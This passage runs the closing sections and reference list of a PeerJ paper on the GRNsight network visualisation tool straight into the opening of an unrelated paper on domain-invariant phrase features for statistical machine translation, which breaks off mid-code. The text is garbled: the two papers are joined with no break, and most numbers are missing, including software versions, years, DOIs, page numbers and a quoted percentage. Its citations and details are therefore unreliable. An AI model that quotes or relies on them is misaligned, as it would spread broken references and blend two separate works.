https://peerj.com/computer-science/ identifier and display label. first, because of the lack of a controlled vocabulary, these are defined differently by different programs. second, in the grnsight-native excel format, transcription factors must be unique in the header columns and rows and serve both as a unique id for that node and the node label. in two implementations of graphml import/ export that we tested with cytoscape v . . and a commercial graph editor called yed (v . , https://www.yworks.com/products/yed), an internal node id is assigned independently of the node label and is not editable by the user. this leads to a situation where the user could assign identical labels to two or more nodes with different ids, raising an issue for correct display of the network in grnsight where node id and node label are synonymous. grnsight accommodates display of node labels from cytoscape- and yed-exported graphml by using a priority system to select among the xml elements it may encounter. finally, as with sif, there is no enforcement of the use of ids from a recognized biological database, even though the potential exists to specify the id source (at least as a comment) in the xml. the format of a graphml export by grnsight is described on the documentation page (http://dondi.github.io/grnsight/documentation.html). in our testing, we have ensured that grnsight can read cytoscape- and yed-exported graphml and that grnsight-exported graphml was accurately read by these two programs, but we cannot guarantee interoperability with other software. 
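to make the export conventions described above concrete, a small unweighted network with three regulatory interactions would be written in the tab-delimited, pairwise sif style described in the text roughly as follows (gene names are invented, and this is a sketch based on the description above rather than a verbatim grnsight export):

geneA	pd	geneB
geneA	pd	geneC
geneB	pd	geneB

for a weighted network, the optimized weight value takes the place of "pd" in the middle column, so the first edge above would instead be exported as, e.g.:

geneA	0.75	geneB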
any issues that arise will need to be addressed on a case-by-case basis through bug reports at our github repository. compliance with fair principles is facilitated by the biosharing registry of standards (mcquilton et al., ; https://biosharing.org). as of this writing, graphml is present in the registry, but as an unclaimed, automatically-generated entry. other formats for sharing network data are potentially more fully fair compliant. however, the addition of each new format, while increasing the flexibility and power of the grnsight software, would incur the cost of additional complexity (http://boxesandarrows.com/complexity- and-user-experience/). this is a corollary of “one thing well” and is, for example, one reason why the complex cytoscape stand-alone application did not fit our initial product requirements. as demonstrated by our tests with cytoscape- and yed-exported graphml, the aphorism that “ % of bioinformatics is getting your data into the right file format” cannot entirely be avoided by developers or users. reusable the fair principles state that metadata and data should be richly described with a plurality of accurate and relevant attributes, released with a clear and accessible usage license, associated with a detailed provenance, and meet domain-relevant community standards. as software, grnsight is reusable because the code is available on github under the open source bsd license. the advantage of having followed test-driven development is that a developer who wishes to reuse the code has a test suite ready to guide development of new features. in terms of data, the criteria for reusability are closely linked to interoperability. while the graphml format is capable of storing metadata, the limitations described above in terms of a lack of controlled vocabulary cause it to fail the reusability test as well. in terms of provenance, grnsight injects a comment into dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.yworks.com/products/yed http://dondi.github.io/grnsight/documentation.html https://biosharing.org http://boxesandarrows.com/complexity-and-user-experience/ http://boxesandarrows.com/complexity-and-user-experience/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the graphml recording what version of grnsight exported the data (as does yed v . , but not cytoscape v . . ). we also note that the grnmap excel workbook format with multiple worksheets has the potential to record both metadata and provenance, although this feature is not implemented at this time. in the end, even the examples given by wilkinson et al. ( ) have varying levels of adherence to the fair principles or “fairness,” which, they argue, should be used as a guide to the incremental improvement of resources. although grnsight has the limitations discussed above, we have done as much as we can to achieve fairness at this time. conclusions we have successfully implemented grnsight, a web application and service for visualizing small- to medium-scale grns that is simple and intuitive to use. grnsight accepts an input file in microsoft excel format (.xlsx), reading a weighted or unweighted adjacency matrix where the regulators are in columns and the target genes are in rows, and automatically lays out and displays unweighted and weighted network graphs in a way that is familiar to biologists. grnsight also has the capability of importing and exporting files in sif and graphml formats. 
although grnsight was originally developed for use with the grnmap modeling software, and has provided useful insight into the interpretation of the grn model described in dahlquist et al. ( ), it has general applicability for displaying any small, unweighted or weighted network with directed edges for systems biology or other application domains. thus, grnsight inhabits a niche not satisfied by other software, doing “one thing well.” grnsight also serves as a model for how best practices for software engineering support reproducible research and can be learned simultaneously with the development of useful bioinformatics software. acknowledgements we would like to thank katrina sherbina and b.j. johnson for their input during the early stages of grnsight development. we would also like to thank masao kitamura for assistance with setting up and administering the grnsight server. we thank the – grnmap research team, chukwuemeka e. azinge, juan s. carrillo, kristen m. horstmann, kayla c. jackson, k. grace johnson, brandon j. klein, tessa a. morris, margaret j. o’neil, trixie anne m. roque, and natalie e. williams, and the students enrolled in the loyola marymount university spring course biology - : biomathematical modeling/mathematics - : survey of biomathematics for testing the software. finally, we thank manuel corpas and an anonymous reviewer for suggestions that have improved both the grnsight code and this manuscript. additional information and declarations funding this work was partially supported by nsf award (k.d.d., b.g.f.), a kadner-pitts research grant (k.d.d.), the loyola marymount university summer undergraduate research program (a.v.) and the loyola marymount university rains research assistant dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ program (n.a.a.). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: nsf (k.d.d., b.g.f.): . kadner-pitts research grant (k.d.d.). loyola marymount university summer undergraduate research program (a.v.). loyola marymount university rains research assistant program (n.a.a.). competing interests the authors declare that they have no competing interests. author contributions � kam d. dahlquist conceived and designed the project, performed the computation work, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � john david n. dionisio conceived and designed the project, performed the computation work, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. � ben g. fitzpatrick conceived and designed the project, performed the computation work, analyzed the data, reviewed and edited drafts of the paper. � nicole a. anguiano conceived and designed the project, performed the computation work, analyzed the data, reviewed drafts of the paper. � anindita varshneya conceived and designed the project, performed the computation work, analyzed the data, reviewed drafts of the paper. � britain j. southwick conceived and designed the project, performed the computation work, analyzed the data, reviewed drafts of the paper. � mihir samdarshi conceived and designed the project, performed the computation work, analyzed the data, reviewed drafts of the paper. 
data deposition the following information was supplied regarding data availability: github code repository: https://github.com/dondi/grnsight. web application: http://dondi.github.io/grnsight/. references afgan e, baker d, van den beek m, blankenberg d, bouvier d, čech m, chilton j, clements d, coraor n, eberhard c, grüning b, guerler a, hillman-jackson j, von kuster g, rasche e, soranzo n, turaga n, taylor j, nekrutenko a, goecks j. . the galaxy platform for accessible, reproducible and collaborative biomedical analyses: update. nucleic acids research (w ):w –w doi . /nar/gkw . alon u. . an introduction to systems biology: design principles of biological circuits. boca raton: chapman & hall/crc. dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/dondi/grnsight http://dondi.github.io/grnsight/ http://dx.doi.org/ . /nar/gkw http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bastian m, heymann s, jacomy m. . gephi: an open source software for exploring and manipulating networks. in: third international aaai conference on weblogs and social media. vol. . palo alto: aaai publications, – . borneman ar, leigh-bell ja, yu h, bertone p, gerstein m, snyder m. . target hub proteins serve as master regulators of development in yeast. genes & development ( ): – doi . /gad. . bostock m, ogievetsky v, heer j. . d : data-driven documents. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . brandes u, eiglsperger m, herman i, himsolt m, marshall ms. . graphml progress report structural layer proposal. in: graph drawing: th international symposium, gd, vienna, austria, september – , revised papers. berlin heidelberg: springer, – . brazas md, yamada jt, ouellette bff. . providing web servers and training in bioinformatics: update on the bioinformatics links directory. nucleic acids research (suppl ):w –w doi . /nar/gkq . brown e. . web development with node and express. beijing: o’reilly. buchman ar, kornberg rd. . a yeast ars-binding protein activates transcription synergistically in combination with other weak activating factors. molecular and cellular biology ( ): – doi . /mcb. . . . card sk, mackinlay jd, shneiderman b. . chapter : information visualization. readings in information visualization: using vision to think. san diego: academic press. dahlquist kd, fitzpatrick bg, camacho et, entzminger sd, wanner nc. . parameter estimation for gene regulatory networks from microarray data: cold shock response in saccharomyces cerevisiae. bulletin of mathematical biology ( ): – doi . /s - - - . dahlquist kd, fitzpatrick bg, dionisio jdn, anguiano na, carrillo js, morris ta, varshneya a, williams ne, johnson kg, roque tam, horstmann km, samdarshi m, azinge ce, klein bj, o’neil mj. a. grnmap and grnsight: open source software for dynamical systems modeling and visualization of medium-scale gene regulatory networks [v ; not peer reviewed]. f research (iscb comm j): doi . /f research. . . dahlquist kd, fitzpatrick bg, dionisio jdn, anguiano na, carrillo js, roque tam, varshneya a, samdarshi m, azinge ce. b. grnmap and grnsight: open source software for dynamical systems modeling and visualization of medium-scale gene regulatory networks [v ; not peer reviewed]. f research (iscb comm j): doi . /f research. . . dionisio jdn, dahlquist kd. . improving the computer science in bioinformatics through open source pedagogy. acm sigcse bulletin ( ): – doi . / . . franz m, lopes ct, huck g, dong y, sumer o, bader gd. . 
cytoscape.js: a graph theory library for visualisation and analysis. bioinformatics ( ): – doi . /bioinformatics/btv . gostner r, baldacci b, morine mj, priami c. . graphical modeling tools for systems biology. acm computing surveys ( ): doi . / . harbison ct, gordon db, lee ti, rinaldi nj, macisaac kd, danford tw, hannett nm, tagne j-b, reynolds db, yoo j, jennings eg, zeitlinger j, pokholok dk, kellis m, rolfe pa, takusagawa kt, lander es, gifford dk, fraenkel e, young ra. . transcriptional regulatory code of a eukaryotic genome. nature ( ): – doi . /nature . dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /gad. http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /nar/gkq http://dx.doi.org/ . /mcb. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /f research. . http://dx.doi.org/ . /f research. . http://dx.doi.org/ . / . http://dx.doi.org/ . /bioinformatics/btv http://dx.doi.org/ . / http://dx.doi.org/ . /nature http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ison j, rapacki k, ménager h, kalaš m, rydza e, chmura p, anthon c, beard n, berka k, bolser d, booth t, bretaudeau a, brezovsky j, casadio r, cesareni g, coppens f, cornell m, cuccuru g, davidsen k, vedova gd, dogan t, doppelt-azeroual o, emery l, gasteiger e, gatter t, goldberg t, grosjean m, grüning b, helmer-citterich m, ienasescu h, ioannidis v, jespersen mc, jimenez r, juty n, juvan p, koch m, laibe c, li j-w, licata l, mareuil f, mičeti�c i, friborg rm, moretti s, morris c, möller s, nenadic a, peterson h, profiti g, rice p, romano p, roncaglia p, saidi r, schafferhans a, schwämmle v, smith c, sperotto mm, stockinger h, va�reková rs, tosatto sce, de la torre v, uva p, via a, yachdav g, zambelli f, vriend g, rost b, parkinson h, løngreen p, brunak s. . tools and data services registry: a community effort to document bioinformatics resources. nucleic acids research (d ):d –d doi . /nar/gkv . lawlor b, walsh p. . engineering bioinformatics: building reliability, performance and productivity into bioinformatics software. bioengineered ( ): – doi . / . . . lee ti, rinaldi nj, robert f, odom dt, bar-joseph z, gerber gk, hannett nm, harbison ct, thompson cm, simon i, zeitlinger j, jennings eg, murray hl, gordon db, ren b, wyrick jj, tagne j-b, volkert tl, fraenkel e, gifford dk, young ra. . transcriptional regulatory networks in saccharomyces cerevisiae. science ( ): – doi . /science. . martin rc. . clean code: a handbook of agile software craftsmanship. upper saddle river: prentice hall. mcquilton p, gonzalez-beltran a, rocca-serra p, thurston m, lister a, maguire e, sansone s-a. . biosharing: curated and crowd-sourced metadata standards, databases and data policies in the life sciences. database: journal of biological databases and curation :baw doi . /database/baw . miyake t, reese j, loch cm, auble dt, li r. . genome-wide analysis of ars (autonomously replicating sequence) binding factor (abf p)-mediated transcriptional regulation in saccharomyces cerevisiae. journal of biological chemistry ( ): – doi . /jbc.m . ni l, bruce c, hart c, leigh-bell j, gelperin d, umansky l, gerstein mb, snyder m. . dynamic and complex transcription factor binding during an inducible response in yeast. genes & development ( ): – doi . /gad. . nielsen j. . usability engineering. boston: academic press. norman da. . the design of everyday things. new york: basic books. pavlopoulos ga, malliarakis d, papanikolaou n, theodosiou t, enright aj, iliopoulos i. . 
visualizing genome and systems biology: technologies, tools, implementation techniques and trends, past, present and future. gigascience ( ): doi . /s - - - . prli�c a, procter jb. . ten simple rules for the open development of scientific software. plos computational biology ( ):e doi . /journal.pcbi. . raymond es. . the cathedral & the bazaar: musings on linux and open source by an accidental revolutionary. beijing: o’reilly. saito r, smoot me, ono k, ruscheinski j, wang p-l, lotia s, pico ar, bader gd, ideker t. . a travel guide to cytoscape plugins. nature methods ( ): – doi . /nmeth. . dahlquist et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /nar/gkv http://dx.doi.org/ . / . . http://dx.doi.org/ . /science. http://dx.doi.org/ . /database/baw http://dx.doi.org/ . /jbc.m http://dx.doi.org/ . /gad. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pcbi. http://dx.doi.org/ . /nmeth. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ salomonis n, hanspers k, zambon ac, vranizan k, lawlor sc, dahlquist kd, doniger sw, stuart j, conklin br, pico ar. . genmapp : new features and resources for pathway analysis. bmc bioinformatics ( ): doi . / - - - . schade b, jansen g, whiteway m, entian kd, thomas dy. . cold adaptation in budding yeast. molecular biology of the cell ( ): – doi . /mbc.e - - . schultheiss sj. . ten simple rules for providing a scientific web resource. plos computational biology ( ):e doi . /journal.pcbi. . schultheiss sj, münch m-c, andreeva gd, rätsch g. . persistence and availability of web services in computational biology. plos one ( ):e doi . /journal.pone. . shannon p, markiel a, ozier o, baliga ns, wang jt, ramage d, amin n, schwikowski b, ideker t. . cytoscape: a software environment for integrated models of biomolecular interaction networks. genome research ( ): – doi . /gr. . shneiderman b, plaisant c, cohen m, jacobs sm, elmqvist n, diakopoulos n. . designing the user interface: strategies for effective human-computer interaction. hoboken: pearson. shore d, nasmyth k. . purification and cloning of a dna binding protein from yeast that binds to both silencer and activator elements. cell ( ): – doi . / - ( ) -x. smoot me, ono k, ruscheinski j, wang p-l, ideker t. . cytoscape . : new features for data integration and network visualization. bioinformatics ( ): – doi . /bioinformatics/btq . teixeira mc, monteiro pt, guerreiro jf, gonçalves jp, mira np, dos santos sc, cabrito tr, palma m, costa c, francisco ap, madeira sc, oliveira al, freitas at, sá-correia i. . the yeastract database: an upgraded information system for the analysis of gene and genomic transcription regulation in saccharomyces cerevisiae. nucleic acids research (d ): d –d doi . /nar/gkt . tufte er. . the visual display of quantitative information. cheshire: graphics press. veretnik s, fink jl, bourne pe. . computational biology resources lack persistence and usability. plos computational biology ( ):e doi . /journal.pcbi. . 
wilkinson md, dumontier m, aalbersberg ijj, appleton g, axton m, baak a, blomberg n, boiten j-w, da silva santos lb, bourne pe, bouwman j, brookes aj, clark t, crosas m, dillo i, dumon o, edmunds s, evelo ct, finkers r, gonzalez-beltran a, gray ajg, groth p, goble c, grethe js, heringa j, 't hoen pac, hooft r, kuhn t, kok r, kok j, lusher sj, martone me, mons a, packer al, persson b, rocca-serra p, roos m, van schaik r, sansone s-a, schultes e, sengstag t, slater t, strawn g, swertz ma, thompson m, van der lei j, van mulligen e, velterop j, waagmeester a, wittenburg p, wolstencroft k, zhao j, mons b. . the fair guiding principles for scientific data management and stewardship. scientific data : doi . /sdata. . . wilson g, aruliah da, brown ct, chue hong np, davis m, guy rt, haddock shd, huff kd, mitchell im, plumbley md, waugh b, white ep, wilson p. . best practices for scientific computing. plos biology ( ):e doi . /journal.pbio. . yachdav g, goldberg t, wilzbach s, dao d, shih i, choudhary s, crouch s, franz m, garcía a, garcía lj, grüning ba, inupakutika d, sillitoe i, thanki as, vieira b, villaveces jm, schneider mv, lewis s, pettifer s, rost b, corpas m. . anatomy of biojs, an open source community for the life sciences. elife :e doi . /elife. .
adapting to all domains at once: rewarding domain invariance in smt hoang cuong and khalil sima'an and ivan titov institute for logic, language and computation university of amsterdam science park , xg amsterdam, the netherlands {c.hoang,k.simaan,titov}@uva.nl abstract existing work on domain adaptation for statistical machine translation has consistently assumed access to a small sample from the test distribution (target domain) at training time. in practice, however, the target domain may not be known at training time or it may change to match user needs. in such situations, it is natural to push the system to make safer choices, giving higher preference to domain-invariant translations, which work well across domains, over risky domain-specific alternatives. we encode this intuition by ( ) inducing latent subdomains from the training data only; ( ) introducing features which measure how specialized phrases are to individual induced sub-domains; ( ) estimating feature weights on out-of-domain data (rather than on the target domain). we conduct experiments on three language pairs and a number of different domains. we observe consistent improvements over a baseline which does not explicitly reward domain invariance. introduction mismatch in phrase translation distributions between test data (target domain) and train data is known to harm performance of statistical translation systems (irvine et al., ; carpuat et al., ). domain-adaptation methods (foster et al., ; bisazza et al., ; sennrich, b; razmara et al., ; sennrich et al., ; haddow, ; joty et al., ) aim to specialize a system estimated on out-of-domain training data to a target domain represented by a small data sample. in practice, however, the target domain may not be known at training time or it may change over time depending on user needs. in this work we address exactly the setting where we have a domain-agnostic system but we have no access to any samples from the target domain at training time. this is an important and challenging setting which, as far as we are aware, has not yet received attention in the literature. when the target domain is unknown at training time, the system could be trained to make safer choices, preferring translations which are likely to work across different domains. for example, when translating from english to russian, the most natural translation for the word 'code' would be highly dependent on the domain (and the corresponding word sense). the russian words 'xifr', 'zakon' or 'programma' would perhaps be optimal choices if we consider cryptography, legal and software development domains, respectively. however, the translation 'kod' is also acceptable across all these domains and, as such, would be a safer choice when the target domain is unknown. note that such a translation may not be the most frequent overall and, consequently, might not be proposed by a standard (i.e., domain-agnostic) phrase-based translation system. in order to encode preference for domain-invariant translations, we introduce a measure which quantifies how likely a phrase (or a phrase-pair) is to be "domain-invariant". we recall that most large parallel corpora are heterogeneous, consisting of diverse language use originating from a variety of unspecified subdomains. for example, news articles may cover sports, finance, politics, technology and a variety of other news topics. none of the subdomains may match the target domain particularly
for example, news articles may cover sports, finance, politics, technology and a variety of other news topics. none of the subdomains may match the target domain particularly well, but they can still reveal how domain-specific a given phrase is. for example, if we would observe that the word 'code' can be translated as 'kod' across cryptography and legal subdomains observed in training data, we can hypothesize that it may work better on a new unknown domain than 'zakon' which was specific only to a single subdomain (legal). this would be a suitable decision if the test domain happens to be software development, even though no texts pertaining to this domain were included in the heterogeneous training data.
importantly, the subdomains are usually not specified in the heterogeneous training data. therefore, we treat the subdomains as latent, so we can induce them automatically. once induced, we define measures of domain specificity, particularly expressing two generic properties:
phrase domain specificity: how specific is a target or a source phrase to some of the induced subdomains?
phrase pair domain coherence: how coherent is a source phrase and a target language translation across the induced subdomains?
these features capture two orthogonal aspects of phrase behaviour in heterogeneous corpora, with the rationale that phrase pairs can be weighted along these two dimensions. domain-specificity captures the intuition that the more specific a phrase is to certain subdomains, the less applicable it is in general. note that specificity is applied not only to target phrases (as 'kod' and 'zakon' in the above example) but also to source phrases. when applied to a source phrase, it may give a preference towards using shorter phrases as they are inherently less domain specific. in contrast to phrase domain specificity, phrase pair coherence reflects whether candidate target and source phrases are typically used in the same set of domains. the intuition here is that the more divergent the distributional behaviour of source and target phrases across subdomains, the less certain we are whether this phrase pair is valid for the unknown target domain. in other words, a translation rule with source and target phrases having two similar distributions over the latent subdomains is likely safer to use.
weights for these features, alongside all other standard features, are tuned on a development set. importantly, we show that there is no noteworthy benefit from tuning the weights on a sample from the target domain. it is enough to tune them on a mixed-domain dataset sufficiently different from the training data. we attribute this attractive property to the fact that our features, unlike the ones typically considered in standard domain-adaptation work, are generic and only affect the amount of risk our system takes. in contrast, for example, in eidelman et al. ( ), chiang et al. ( ), hu et al. ( ), hasler et al. ( ), su et al. ( ), sennrich ( b), chen et al. ( b), and carpuat et al. ( ), features capture similarities between a target domain and each of the training subdomains.
clearly, domain adaptation with such rich features, though potentially more powerful, would not be possible without a development set closely matching the target domain.
we conduct our experiments on three language pairs and explore adaptation to nine domain adaptation tasks in total. we observe significant and consistent performance improvements over the baseline domain-agnostic systems. this result confirms that our two features, and the latent subdomains they are computed from, are useful also for the very challenging domain adaptation setting considered in this work.

domain-invariance for phrases

at the core of a standard state-of-the-art phrase-based system (koehn et al., ; och and ney, ) lies a phrase table {〈ẽ, f̃〉} extracted from a word-aligned training corpus together with estimates for phrase translation probabilities pcount(ẽ|f̃) and pcount(f̃|ẽ). typically the phrases and their probabilities are obtained from large parallel corpora, which are usually broad enough to cover a mixture of several subdomains. in such mixtures, phrase distributions may be different across different subdomains. some phrases (whether source or target) are more specific for certain subdomains than others, while some phrases are useful across many subdomains. moreover, for a phrase pair, the distribution over the subdomains for its source side may be similar or not to the distribution for its target side.

[figure 1: the projection framework — source and target phrases are each projected into a k-dimensional vector space of probabilistic latent subdomains (domain.1, ..., domain.k).]

coherent pairs seem safer to employ than pairs that exhibit different distributions over the subdomains. these two factors, domain specificity and domain coherence, can be estimated from the training corpus if we have access to subdomain statistics for the phrases. in the setting addressed here, the subdomains are not known in advance and we have to consider them latent in the training data.
therefore, we introduce a random variable z ∈ {1, . . . , k} encoding (arbitrary) k latent subdomains that generate each source and target phrase ẽ and f̃ of every phrase pair 〈ẽ, f̃〉. in the next section, we aim to estimate distributions p(z|ẽ) and p(z|f̃) for subdomain z over the source and target phrases respectively. in other words, we aim at projecting phrases onto a compact (k−1)-dimensional simplex of subdomains with vectors:

\vec{\tilde{e}} = [\, p(z = 1 \mid \tilde{e}), \ldots, p(z = k \mid \tilde{e}) \,],   (1)
\vec{\tilde{f}} = [\, p(z = 1 \mid \tilde{f}), \ldots, p(z = k \mid \tilde{f}) \,].   (2)

each of the k elements encodes how well each source and target phrase expresses a specific latent subdomain in the training data. see fig. 1 for an illustration of the projection framework. once the projection is performed, the hidden cross-domain translation behaviour of phrases and phrase pairs can be modeled as follows:
• domain-specificity of phrases: a rule with source and target phrases having a peaked distribution over latent subdomains is likely domain-specific. technically speaking, entropy comes as a natural choice for quantifying domain specificity. here, we opt for the renyi entropy and define the domain specificity as follows:

d_{\alpha}(\vec{\tilde{e}}) = \frac{1}{1-\alpha} \log \left( \sum_{i=1}^{k} p(z = i \mid \tilde{e})^{\alpha} \right)
d_{\alpha}(\vec{\tilde{f}}) = \frac{1}{1-\alpha} \log \left( \sum_{i=1}^{k} p(z = i \mid \tilde{f})^{\alpha} \right)

for convenience, we refer to dα(·) as the domain specificity of a phrase. in this study, we choose the value of α as 2, which is the default choice (also known as the collision entropy).
• source-target coherence across subdomains: a translation rule with source and target phrases having two similar distributions over the latent subdomains is likely safer to use. we use the chebyshev distance for measuring the similarity between two distributions. the divergence of the two vectors is defined as follows:

d(\vec{\tilde{e}}, \vec{\tilde{f}}) = \max_{i \in \{1, \ldots, k\}} \left| p(z = i \mid \tilde{e}) - p(z = i \mid \tilde{f}) \right|

we refer to d(ẽ, f̃) as the phrase pair coherence across latent subdomains. we investigated some other similarities for phrase pair coherence (the kullback-leibler divergence and the hellinger distance) but have not observed any noticeable improvements in the performance. we will discuss these experiments in the empirical section.
once computed for every phrase pair, the two measures dα(ẽ), dα(f̃) and d(ẽ, f̃) will be integrated into a phrase-based smt system as feature functions.
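to make the two feature functions concrete, the following short python sketch (not the authors' code; the function and variable names are ours, and the renyi form follows the reconstruction above with α = 2) computes the feature values for a single phrase pair, assuming its subdomain posterior vectors p(z|ẽ) and p(z|f̃) have already been estimated:

import math

def domain_specificity(p, alpha=2.0):
    # renyi entropy of a subdomain distribution p (a list of probabilities);
    # alpha = 2 corresponds to the collision entropy used as the default here.
    # the paper calls this value the "domain specificity" of a phrase:
    # a peaked (domain-specific) distribution yields a low entropy value,
    # a flat (domain-invariant) one a high value.
    return (1.0 / (1.0 - alpha)) * math.log(sum(p_i ** alpha for p_i in p))

def pair_coherence(p_src, p_tgt):
    # chebyshev distance between the source- and target-side subdomain
    # distributions; smaller values mean the two sides behave more
    # similarly across the latent subdomains.
    return max(abs(ps - pt) for ps, pt in zip(p_src, p_tgt))

# toy example with k = 3 latent subdomains
p_f = [0.40, 0.30, 0.30]   # source phrase: used fairly evenly across subdomains
p_e = [0.90, 0.05, 0.05]   # target phrase: strongly tied to one subdomain

features = {
    "spec_source": domain_specificity(p_f),   # dα(f̃)
    "spec_target": domain_specificity(p_e),   # dα(ẽ)
    "coherence":   pair_coherence(p_f, p_e),  # d(ẽ, f̃)
}
print(features)

in a phrase-based decoder these three values would simply be attached to each phrase-table entry as extra scores, with their weights tuned together with the standard features (weight tuning is described in the experiments section).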
latent subdomain induction

we now present our approach for inducing latent subdomain distributions p(z|ẽ) and p(z|f̃) for every source and target phrase ẽ and f̃. in our experiments, we compare using our subdomain induction framework with relying on topic distributions provided by a standard topic model, latent dirichlet allocation (blei et al., ). note that unlike lda we rely on parallel data and word alignments when inducing domains. our intuition is that latent variables capturing regularities in bilingual data may be more appropriate for the translation task.
inducing these probabilities directly is rather difficult as the task of designing a fully generative phrase-based model is known to be challenging (doing that requires incorporating into the model additional hidden variables encoding phrase segmentation (denero et al., ), which would significantly complicate inference (mylonakis and sima'an, ; neubig et al., ; cohn and haffari, )). in order to avoid this, we follow matsoukas et al. ( ) and cuong and sima'an ( a) who "embed" such a phrase-level model into a latent subdomain model that works at the sentence level. in other words, we associate latent domains with sentence pairs rather than with phrases, and use the posterior probabilities computed for the sentences with all the phrases appearing in the corresponding sentences. given p(z|e, f) - a latent subdomain model for sentence pairs 〈e, f〉 - the estimation of p(z|ẽ) and p(z|f̃), for phrases ẽ and f̃, can be simplified by computing expectations for all z ∈ {1, . . . , k}:

p(z = i \mid \tilde{e}) = \frac{\sum_{e,f} p(z = i \mid e, f)\, c(\tilde{e}; e)}{\sum_{i'=1}^{k} \sum_{e,f} p(z = i' \mid e, f)\, c(\tilde{e}; e)},
p(z = i \mid \tilde{f}) = \frac{\sum_{e,f} p(z = i \mid e, f)\, c(\tilde{f}; f)}{\sum_{i'=1}^{k} \sum_{e,f} p(z = i' \mid e, f)\, c(\tilde{f}; f)}.

here, c(ẽ; e) is the count of a phrase ẽ in a sentence e in the training corpus.

latent subdomains for sentences. we now turn to describing our latent subdomain model for sentences. we assume the following generative story for sentence pairs:
1. generate the domain z from the prior p(z);
2. choose the generation direction: f-to-e or e-to-f, with equal probability;
3. if the e-to-f direction is chosen then generate the pair relying on p(e|z)p(f|e, z);
4. otherwise, use p(f|z)p(e|f, z).
formally, it is a uniform mixture of the generative processes for the two potential translation directions. this generative story implies having two translation models (tms) and two language models (lms), each augmented with latent subdomains. now, the posterior p(z|e, f) can be computed as

p(z \mid e, f) \propto p(z) \left( p(e \mid z)\, p(f \mid e, z) + p(f \mid z)\, p(e \mid f, z) \right).   (3)

as we aim for a simple approach, our tms are computed through the introduction of hidden alignments a and a′ in the f-to-e and e-to-f directions respectively, in which p(f|e, z) = Σ_a p(f, a|e, z) and p(e|f, z) = Σ_{a′} p(e, a′|f, z). to make the marginalization of alignments tractable, we restrict p(f, a|e, z) and p(e, a′|f, z) to the same assumptions as ibm model 1 (brown et al., ) (i.e., a multiplication of lexical translation probabilities with respect to latent subdomains). we use a standard nth-order markov model for p(e|z) and p(f|z), in which

p(e \mid z) = \prod_i p(e_i \mid e_{i-n}^{i-1}, z)  and  p(f \mid z) = \prod_j p(f_j \mid f_{j-n}^{j-1}, z).

here, the notation e_{i-n}^{i-1} and f_{j-n}^{j-1} is used to denote the history of length n for the source and target words e_i and f_j, respectively.

training. for training, we maximize the log-likelihood l of the data:

\mathcal{L} = \sum_{e,f} \log \left( \sum_z p(z) \Big( p(e \mid z) \sum_a p(f, a \mid e, z) + p(f \mid z) \sum_{a'} p(e, a' \mid f, z) \Big) \right).   (4)

as there is no closed-form solution, we use the expectation-maximization (em) algorithm (dempster et al., ). (note that we effectively average between the two directions, which is reasonable, as there is no reason to give preference to either of them.)
in the e-step, we compute the posterior distributions p(a, z|e, f) and p(a′, z|e, f) as follows:

p(a, z \mid e, f) \propto p(z) \Big( p(e \mid z)\, p(f, a \mid e, z) + p(f \mid z) \sum_{a'} p(e, a' \mid f, z) \Big),   (5)
p(a', z \mid e, f) \propto p(z) \Big( p(e \mid z) \sum_a p(f, a \mid e, z) + p(f \mid z)\, p(e, a' \mid f, z) \Big).   (6)

in the m-step, we use the posteriors p(a, z|e, f) and p(a′, z|e, f) to re-estimate parameters of both alignment models. this is done in a very similar way to estimation of the standard ibm model 1. we use the posteriors to re-estimate lm parameters as follows:

p(e_i \mid e_{i-1}, z) \propto \sum_{e,f} p(z \mid e, f)\, c(e_{i-1}^{\,i}; e),   (7)
p(f_j \mid f_{j-1}, z) \propto \sum_{e,f} p(z \mid e, f)\, c(f_{j-1}^{\,j}; f).   (8)

to obtain better parameter estimates for word predictions and avoid overfitting, we use smoothing in the m-step. in this work, we chose to apply the expected kneser-ney smoothing technique (zhang and chiang, ) as it is simple and achieves state-of-the-art performance on the language modeling problem. finally, p(z) can be simply estimated as follows:

p(z) \propto \sum_{e,f} p(z \mid e, f).   (9)

hierarchical training. in practice, we found that training the full joint model leads to brittle performance, as em is very likely to get stuck in bad local maxima. to address this difficulty, in our implementation, we start out by first jointly training p(z), p(e|z) and p(f|z). in this way, in the e-step we fix our model parameters and compute p(z|e, f) for every sentence pair: p(z|e, f) ∝ p(e|z)p(f|z)p(z). in the m-step, we use the posteriors to re-estimate the model parameters, as in equations (7), (8) and (9). once the model is trained, we fix the language modeling parameters and finally train the full model. (this procedure can be regarded as a form of hierarchical estimation: we start with a simpler model and then use it to drive a more expressive model. note that we also use the p(z) estimated within the parallel latent subdomain lms to initialize p(z) for the latent subdomain alignment model.) this parallel latent subdomain language model is less expressive and, consequently, is less likely to get stuck in a local maximum. the lms estimated in this way will then drive the full alignment model towards better configurations in the parameter space. in practice, this training scheme is particularly useful in case of learning a more fine-grained latent subdomain model with larger k.
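for illustration, here is a compact python sketch of the first stage of this hierarchical scheme only, i.e., em for the parallel latent subdomain language model p(z|e, f) ∝ p(e|z) p(f|z) p(z). it is not the authors' implementation: for brevity it uses unigram language models and a simple probability floor instead of expected kneser-ney smoothing, and it omits the alignment models of the full model; all names are ours.

import math
import random
from collections import defaultdict

def train_parallel_lm_mixture(corpus, k, iterations=5, seed=0, floor=1e-10):
    # corpus: list of (source_tokens, target_tokens) sentence pairs.
    # returns the prior p(z) and the per-sentence posteriors p(z | e, f).
    rng = random.Random(seed)
    # random soft initialisation of the per-sentence responsibilities
    post = []
    for _ in corpus:
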